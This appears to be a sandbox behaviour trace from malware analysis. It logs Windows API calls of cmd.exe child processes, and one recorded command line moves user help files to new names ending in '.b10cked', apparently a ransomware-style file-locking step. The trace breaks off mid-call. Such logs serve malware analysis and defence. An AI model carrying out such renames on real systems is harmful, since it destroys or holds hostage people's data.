[0195.938] _wcsicmp (_String1="move", _String2="CD") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="REN") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="SET") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0195.938] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="MD") returned 11 [0195.938] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0195.938] _wcsicmp (_String1="move", _String2="RD") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0195.938] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0195.938] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0195.938] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0195.938] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="VER") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0195.938] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0195.938] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0195.938] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0195.938] _wcsicmp (_String1="move", _String2="START") returned -6 [0195.939] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0195.939] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0195.939] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0195.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0195.940] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf27c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf274, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf274*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0195.940] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0195.941] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0195.941] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0195.941] _wcsicmp (_String1="HX_103~1.HXW", _String2=".") returned 58 [0195.941] _wcsicmp (_String1="HX_103~1.HXW", _String2="..") returned 58 [0195.941] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxw")) returned 0x2022 [0195.942] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3d1e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", nBufferLength=0x104, lpBuffer=0x1cec04, lpFilePart=0x1cebec | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", lpFilePart=0x1cebec*="HX_103~1.HXW") returned 0x27 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0195.942] _wcsicmp (_String1="HX_103~1.HXW", _String2=".") returned 58 [0195.942] _wcsicmp (_String1="HX_103~1.HXW", _String2="..") returned 58 [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_103~1.hxw")) returned 0x2022 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", nBufferLength=0x104, lpBuffer=0x1cf080, lpFilePart=0x1cee18 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", lpFilePart=0x1cee18*="HX_103~1.HXW") returned 0x27 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] SetErrorMode (uMode=0x0) returned 0x0 [0195.942] SetErrorMode (uMode=0x1) returned 0x0 [0195.942] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked", nBufferLength=0x104, lpBuffer=0x1cf288, lpFilePart=0x1cee18 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked", lpFilePart=0x1cee18*="Hx_1033_MKWD_K.HxW.b10cked") returned 0x35 [0195.942] SetErrorMode (uMode=0x0) returned 0x1 [0195.942] SetLastError (dwErrCode=0x0) [0195.942] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_K.HxW.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\hx_1033_mkwd_k.hxw.b10cked")) returned 0xffffffff [0195.942] GetLastError () returned 0x2 [0195.942] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x1ce794, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce794) returned 0x3c0e50 [0195.943] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x1ce794 | out: lpFindFileData=0x1ce794) returned 0 [0195.943] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.943] GetLastError () returned 0x12 [0195.943] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x1ce794, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ce794) returned 0x3c0e50 [0195.943] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x1ce794 | out: lpFindFileData=0x1ce794) returned 0 [0195.943] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.944] GetLastError () returned 0x12 [0195.944] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x3d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1bd0) returned 0x3c0e50 [0195.944] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x3d1bd0 | out: lpFindFileData=0x3d1bd0) returned 0 [0195.944] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.944] GetLastError () returned 0x12 [0195.944] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~1.HXW", fInfoLevelId=0x1, lpFindFileData=0x3d1bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3d1bd0) returned 0x3c0e50 [0195.945] FindNextFileW (in: hFindFile=0x3c0e50, lpFindFileData=0x3d1bd0 | out: lpFindFileData=0x3d1bd0) returned 0 [0195.945] FindClose (in: hFindFile=0x3c0e50 | out: hFindFile=0x3c0e50) returned 1 [0195.945] GetLastError () returned 0x12 [0195.945] _get_osfhandle (_FileHandle=2) returned 0xb [0195.945] GetFileType (hFile=0xb) returned 0x2 [0196.122] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0196.122] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ce964 | out: lpMode=0x1ce964) returned 1 [0196.123] _get_osfhandle (_FileHandle=2) returned 0xb [0196.123] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1ce998 | out: lpConsoleScreenBufferInfo=0x1ce998) returned 1 [0196.123] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.124] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce9d8 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0196.124] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1ce9bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce9bc*=0x2c) returned 1 [0196.124] longjmp () [0196.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.124] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.124] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.124] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.125] SetConsoleInputExeNameW () returned 0x1 [0196.125] GetConsoleOutputCP () returned 0x1b5 [0196.125] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.125] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.125] exit (_Code=1) Process: id = "452" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16920" os_pid = "0x53c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\HX_103~2.HXW\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\Hx_1033_MKWD_NamedURL.HxW.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28866 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28867 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28868 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28869 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 28870 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28871 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28872 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28873 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28874 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 28875 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28903 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28904 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28905 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28906 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 28907 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 28908 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28909 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28910 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28911 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28912 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28913 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28914 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28915 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28916 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28917 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 28918 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28919 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28920 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 28921 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 28922 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 28923 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 28924 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 28925 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 28926 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 28938 start_va = 0x1370000 end_va = 0x142ffff entry_point = 0x1370000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 645 os_tid = 0xc20 [0196.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe94 | out: lpSystemTimeAsFileTime=0x24fe94*(dwLowDateTime=0xa9b0e460, dwHighDateTime=0x1d440a9)) [0196.072] GetCurrentProcessId () returned 0x53c [0196.072] GetCurrentThreadId () returned 0xc20 [0196.072] GetTickCount () returned 0x37953 [0196.072] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe8c | out: lpPerformanceCount=0x24fe8c*=25286149052) returned 1 [0196.073] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0196.073] __set_app_type (_Type=0x1) [0196.073] __p__fmode () returned 0x76b331f4 [0196.073] __p__commode () returned 0x76b331fc [0196.073] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0196.073] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0196.073] GetCurrentThreadId () returned 0xc20 [0196.073] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc20) returned 0x38 [0196.073] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0196.073] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0196.073] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.074] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.074] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fe24 | out: phkResult=0x24fe24*=0x0) returned 0x2 [0196.074] VirtualQuery (in: lpAddress=0x24fe5b, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.074] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdf4, dwLength=0x1c | out: lpBuffer=0x24fdf4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0196.074] GetConsoleOutputCP () returned 0x1b5 [0196.074] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0196.074] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0196.074] _get_osfhandle (_FileHandle=1) returned 0x7 [0196.074] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0196.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.075] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0196.075] _get_osfhandle (_FileHandle=0) returned 0x3 [0196.075] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0196.075] GetEnvironmentStringsW () returned 0x2f0190* [0196.075] FreeEnvironmentStringsW (penv=0x2f0190) returned 1 [0196.075] GetEnvironmentStringsW () returned 0x2f0190* [0196.075] FreeEnvironmentStringsW (penv=0x2f0190) returned 1 [0196.075] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed94 | out: phkResult=0x24ed94*=0x40) returned 0x0 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0xb8, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.075] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x0, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegCloseKey (hKey=0x40) returned 0x0 [0196.076] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed94 | out: phkResult=0x24ed94*=0x40) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x40, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x0, lpData=0x24eda0*=0x1, lpcbData=0x24ed98*=0x1000) returned 0x2 [0196.076] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed9c, lpData=0x24eda0, lpcbData=0x24ed98*=0x1000 | out: lpType=0x24ed9c*=0x4, lpData=0x24eda0*=0x0, lpcbData=0x24ed98*=0x4) returned 0x0 [0196.076] RegQueryValueExW (in: 